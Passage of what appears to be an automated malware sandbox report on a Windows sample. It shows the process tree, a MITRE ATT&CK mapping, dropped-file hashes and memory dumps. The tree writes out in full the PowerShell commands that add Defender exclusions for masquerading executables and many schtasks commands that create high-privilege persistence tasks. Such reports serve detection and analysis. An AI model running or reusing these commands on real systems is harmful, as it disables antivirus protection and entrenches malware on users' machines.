  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\CrashReports\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Games\Solitaire\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\it-IT\smss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\lsass.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\Sample Videos\audiodg.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\hrtfs\System.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\PRQTW9ZyiV.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:3060
- - C:\Program Files\Windows Photo Viewer\it-IT\smss.exe
    "C:\Program Files\Windows Photo Viewer\it-IT\smss.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2024
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9d0ac6ab-2315-42c5-858b-b1ec87260ee0.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1384
    - - C:\Program Files\Windows Photo Viewer\it-IT\smss.exe
        
        "C:\Program Files\Windows Photo Viewer\it-IT\smss.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:1556
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\deef3e13-78b5-47a7-a833-1e912fa41235.vbs"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2636
        
        C:\Program Files\Windows Photo Viewer\it-IT\smss.exe
        
        "C:\Program Files\Windows Photo Viewer\it-IT\smss.exe"
        7⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:1936
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\037827f1-63eb-4d9c-bfc7-8f78f0b0b93d.vbs"
        8⤵
        
        PID:1696
        
        C:\Program Files\Windows Photo Viewer\it-IT\smss.exe
        
        "C:\Program Files\Windows Photo Viewer\it-IT\smss.exe"
        9⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2288
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\420d9738-b536-4917-abcf-cb0587816d97.vbs"
        10⤵
        
        PID:2388
        
        C:\Program Files\Windows Photo Viewer\it-IT\smss.exe
        
        "C:\Program Files\Windows Photo Viewer\it-IT\smss.exe"
        11⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1560
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9a86cfbb-6a98-4df7-a9c4-277cb26b0161.vbs"
        12⤵
        
        PID:2820
        
        C:\Program Files\Windows Photo Viewer\it-IT\smss.exe
        
        "C:\Program Files\Windows Photo Viewer\it-IT\smss.exe"
        13⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1848
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f7330ac4-6f1f-430b-bc18-adc288ea0dd9.vbs"
        14⤵
        
        PID:1368
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5c24142d-ab86-42d8-802a-a079af14d130.vbs"
        14⤵
        
        PID:2328
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b13590d-ad38-4b2f-ae27-f573c4209a64.vbs"
        12⤵
        
        PID:1780
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09044b84-5529-47dd-8b5c-31928876cb3d.vbs"
        10⤵
        
        PID:2336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9815b0f3-9365-4a2a-8f24-241558341c3b.vbs"
        8⤵
        
        PID:1240
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e290c2eb-b434-40e2-a0be-494be6178967.vbs"
        6⤵
        
        PID:1244
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6a9bd19c-bab2-48df-b379-bc38a9638085.vbs"
      4⤵
      PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Google\CrashReports\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\CrashReports\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\CrashReports\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Games\Solitaire\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\Solitaire\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Games\Solitaire\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\it-IT\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\it-IT\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Photo Viewer\it-IT\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Videos\Sample Videos\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\Public\Videos\Sample Videos\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\Sample Videos\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe

Filesize
1.8MB

MD5
30742ba610a6e66abe158742a400b5a0

SHA1
2ae4b096bc3cfdc876204597a74a69f7203e1b1d

SHA256
36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bf

SHA512
c4c6da35dbadbf12fba72fe695c056d5dcc5b7793b98ded3c66877f9db4e5360f0371ec08c76ce4f85d6585ee40e3110b41889883f0bc436add314f01cb099e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\037827f1-63eb-4d9c-bfc7-8f78f0b0b93d.vbs

Filesize
728B

MD5
3e7fb9509353496d7e26a9570ef4d638

SHA1
9b96b245f612c92681707dc8a1ce355c54833819

SHA256
677b6cb178b90022d7c9b695eb203f84924bee3004338e2fa0c9669d994a8dae

SHA512
22ad88032186cdc70062c3696a2319bf0b15e1836eb90755dcb9664d9c000676f99ae7e25b6382666e4461a7e06ab07dc93b1012b22b34a8621ebf2f7221a973

Download Submit
C:\Users\Admin\AppData\Local\Temp\420d9738-b536-4917-abcf-cb0587816d97.vbs

Filesize
728B

MD5
71607c7b35c5c0317c00f7fcac0fd810

SHA1
6e2423d5007507e64afe0a7bad40cb64a02d36d0

SHA256
7a20a4fd647404d01d058aa0b5506f70288770e29262893222aada45710eb754

SHA512
8d9eafd6ebf1023e02adfd093e789e36006c68f4b2bb0c4565083bf7df2a79fdfff76a08514cb03ab9376c8e941841a6608818ead55692608d79734c2c2391ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\6a9bd19c-bab2-48df-b379-bc38a9638085.vbs

Filesize
504B

MD5
c7dd8e7b25dbc284ddf50825270db16e

SHA1
1461e50b68f7fc2a96db3291b85d023b7fb9e5a8

SHA256
90761e87c06a704dcc72608b57a3e2b86a33211a941ea3c3479cb68b885e24b4

SHA512
3de1efdc70dc81f5d8e46d71369bbdbbfec488fc027bf59cf2ab2e47a66fccbeeaaf0e66cb080e7187a84e0baf94e7cc1a96978fadb8fee42c3fec2b7ab9e339

Download Submit
C:\Users\Admin\AppData\Local\Temp\9a86cfbb-6a98-4df7-a9c4-277cb26b0161.vbs

Filesize
728B

MD5
09be13b313fc6a9d4e40c9a42053dc73

SHA1
026e583b5a9ef40e46ad15239980cdb911effc33

SHA256
073c3d749878a0a609342df31038fda610d1c68cb41f6223738369750d80fc48

SHA512
5b6719e472bbd8e00b280cb7ca61f20e47ff341775c4146ef7a38fd4e6138f9524ed8f128396b8684974db09b0c325cd09594feaf38cb38e91e910650462c3b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\9d0ac6ab-2315-42c5-858b-b1ec87260ee0.vbs

Filesize
728B

MD5
dfad31ba25054c9ba8a1198fa9d30697

SHA1
b391688f546e3377d327468f53a1de5ba77d0134

SHA256
74740d8cc17a2a7a721c80a31029263bd615609a04f905b441b03f6d13e6d9cc

SHA512
6c0a4c3d966ce39c147dd2a92b32e881ca417fc1f2503de06127c747176f3d8c57e85d9696fec018933db44c1d5680c612aaa4f81e5665cd88898be5faae5799

Download Submit
C:\Users\Admin\AppData\Local\Temp\PRQTW9ZyiV.bat

Filesize
217B

MD5
10b118fa100cae86d44cd0e0d5624d8e

SHA1
84c21ecebc3e024eeb0bdb2c76d14932dd0db29d

SHA256
b117a819e1d6914588402aa155f14a570274260afa4737a9cb50847b53951cd8

SHA512
f531320e69939fccd2c1b25a796bac2d17774396bb3b4dad12775a24c74b04dcf0a5c5186e87f7f3f27752a587a7dcd37c133e7428334b37ff6e732101a80e01

Download Submit
C:\Users\Admin\AppData\Local\Temp\deef3e13-78b5-47a7-a833-1e912fa41235.vbs

Filesize
728B

MD5
fc1a51669007d8a2b8368561a148a79c

SHA1
4e9630e0c5183f9420446f9a48a584fcb87a3b63

SHA256
3da0de8433bbba956490e8cfb445fa2443e5520553b3d78ed88e3d6830f43c7b

SHA512
369bf54461ada16017e2181393d647ff1089c2c8967141fc3025b871653a98898d2f0b70a1ae9a59efc146b55295b73f2280c160ddeb48743e9386b58000f3be

Download Submit
C:\Users\Admin\AppData\Local\Temp\f7330ac4-6f1f-430b-bc18-adc288ea0dd9.vbs

Filesize
728B

MD5
da3d84938df6c33703e4da79da45cc0e

SHA1
cf06d83cd85907479d2a0083326bdf8163587d17

SHA256
99d0bd31367dc027b49e2c52f240056238a90a02e32aaf708435ea9d614a415d

SHA512
c37e64e125e8302aa443c1c0e46739505112ff4b53b8c5d1fb1bb34739ffe547fe283fbcd14fe5769e1337145507e82df95e100d3750a99fb7ab8fc9b36f23e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R3P8H8Z2OPUO672B0EWI.temp

Filesize
7KB

MD5
1dd0fff341efb906866411e7772efe08

SHA1
f8114e324bf1ccfbcdea8d159d28d4732448ca24

SHA256
3491343e6e9897435ab188344b07a47012d4a8908939d3d887b94f9e236b5547

SHA512
c31558c5c12d995812c09e2299c16090b3d5c89bdbbf1a64bf39c3517c5302e57926bd189a6df70e4dfdde96d26aa4ad5e5449d2ac1afb9bbb125c40894c7db9

Download Submit
C:\Users\Default\dllhost.exe

Filesize
1.8MB

MD5
4a84196a0498d56bde3f69e298e7891a

SHA1
a4c0132bcac5eaea397646f64ab0d11419cc61f9

SHA256
c935b4641d7fe6d93dd7442628bff105913cf77f08271386f7fc4eb0234696ce

SHA512
34f9ac19a74f11d2501dcf3fe8084005c3100fbad0917a50cec5349808f8bd1692a4a7b64ac2b1d8fd76cd965a01725be7eeffb450917affae7a317d6451154f

Download Submit
memory/1556-196-0x00000000000E0000-0x00000000002AE000-memory.dmp

Filesize
1.8MB

Download
memory/1556-197-0x00000000003E0000-0x00000000003F2000-memory.dmp

Filesize
72KB

Download
memory/1560-233-0x0000000000540000-0x0000000000552000-memory.dmp

Filesize
72KB

Download
memory/1620-1-0x0000000000180000-0x000000000034E000-memory.dmp

Filesize
1.8MB

Download
memory/1620-14-0x00000000006B0000-0x00000000006BC000-memory.dmp

Filesize
48KB

Download
memory/1620-11-0x00000000005C0000-0x00000000005CA000-memory.dmp

Filesize
40KB

Download
memory/1620-10-0x0000000000590000-0x00000000005A2000-memory.dmp

Filesize
72KB

Download
memory/1620-9-0x0000000000580000-0x000000000058A000-memory.dmp

Filesize
40KB

Download
memory/1620-8-0x0000000000570000-0x0000000000580000-memory.dmp

Filesize
64KB

Download
memory/1620-4-0x0000000000160000-0x0000000000168000-memory.dmp

Filesize
32KB

Download
memory/1620-2-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp

Filesize
9.9MB

Download
memory/1620-142-0x000007FEF6000000-0x000007FEF69EC000-memory.dmp

Filesize
9.9MB

Download
memory/1620-15-0x00000000006C0000-0x00000000006CC000-memory.dmp

Filesize
48KB

Download
memory/1620-3-0x0000000000140000-0x000000000015C000-memory.dmp

Filesize
112KB

Download
memory/1620-7-0x0000000000350000-0x0000000000362000-memory.dmp

Filesize
72KB

Download
memory/1620-6-0x00000000003E0000-0x00000000003F6000-memory.dmp

Filesize
88KB

Download
memory/1620-0-0x000007FEF6003000-0x000007FEF6004000-memory.dmp

Filesize
4KB

Download
memory/1620-13-0x0000000000660000-0x000000000066E000-memory.dmp

Filesize
56KB

Download
memory/1620-5-0x0000000000170000-0x0000000000180000-memory.dmp

Filesize
64KB

Download
memory/1620-12-0x0000000000650000-0x000000000065E000-memory.dmp

Filesize
56KB

Download
memory/1936-209-0x0000000000FC0000-0x000000000118E000-memory.dmp

Filesize
1.8MB

Download
memory/2024-185-0x0000000000530000-0x0000000000542000-memory.dmp

Filesize
72KB

Download
memory/2024-184-0x0000000001060000-0x000000000122E000-memory.dmp

Filesize
1.8MB

Download
memory/2044-140-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2288-221-0x0000000000530000-0x0000000000542000-memory.dmp

Filesize
72KB

Download
memory/3016-141-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download